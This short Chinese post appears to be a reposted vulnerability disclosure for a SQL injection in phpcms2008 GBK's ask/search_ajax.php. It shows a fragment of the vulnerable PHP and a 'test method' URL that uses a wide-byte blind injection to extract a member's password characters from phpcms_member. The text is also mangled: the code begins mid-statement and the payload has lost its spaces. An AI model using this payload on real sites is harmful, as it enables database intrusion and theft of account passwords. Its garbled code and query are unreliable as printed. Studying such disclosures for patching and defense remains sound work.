|
|
作者:nuke 受影响程序: phpcms2008 gbk 漏洞文件:ask/search_ajax.php code: listinfo($where, \“askid DESC\“, \“\“, 10); foreach($infos as $key=>$val) { $val[\“title\“] = str_replace($q, \“\“.$q.\“\“, $val[\“title\“]); $info[$key][\“title\“] = CHARSET != \“utf-8\“ ? iconv(CHARSET, \“utf-8\“, $val[\“title\“]) : $val[\“title\“]; $info[$key][\“url\“] = $val[\“url\“]; } echo(json_encode($info)); ?> 测试方法:ask/search_ajax.php?q=s%E6\“or(select ascii(substring(password,1,1))fromphpcms_memberwhereusername=0x706870636D73)>52%23
(责任编辑:网络) |
|
发表于 2020-11-1 00:00:00
